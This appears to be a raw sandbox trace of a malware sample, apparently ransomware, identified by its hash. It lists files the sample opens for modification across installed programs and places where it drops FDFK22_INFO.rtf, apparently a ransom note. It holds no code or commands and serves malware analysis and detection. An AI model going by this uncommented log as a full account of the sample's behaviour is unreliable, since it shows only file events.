C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mahe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\America\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-7 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Easter a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\ConvertToSync.m3u a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Maceio a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Jujuy a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baku a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-4 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Hermosillo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port_of_Spain a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Copenhagen a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\en-US\Journal.exe.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Madeira a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Samara a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper.registry_1.0.300.v20130327-1442.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guadalcanal a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\DumontDUrville a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-10 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Istanbul a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sitka a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Cordoba a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\rt.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\charsets.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-progress.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Asuncion a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Berlin a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\London a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Port_Moresby a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayman a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Luxembourg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Real.mpp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Nauru a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\logging.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Brisbane a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Porto_Velho a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-7 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\LICENSE a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CET a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\FindBlock.pps a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\common.js a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\config.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novosibirsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansRegular.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\jce.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.password.template a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_TW.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFK22_INFO.rtf 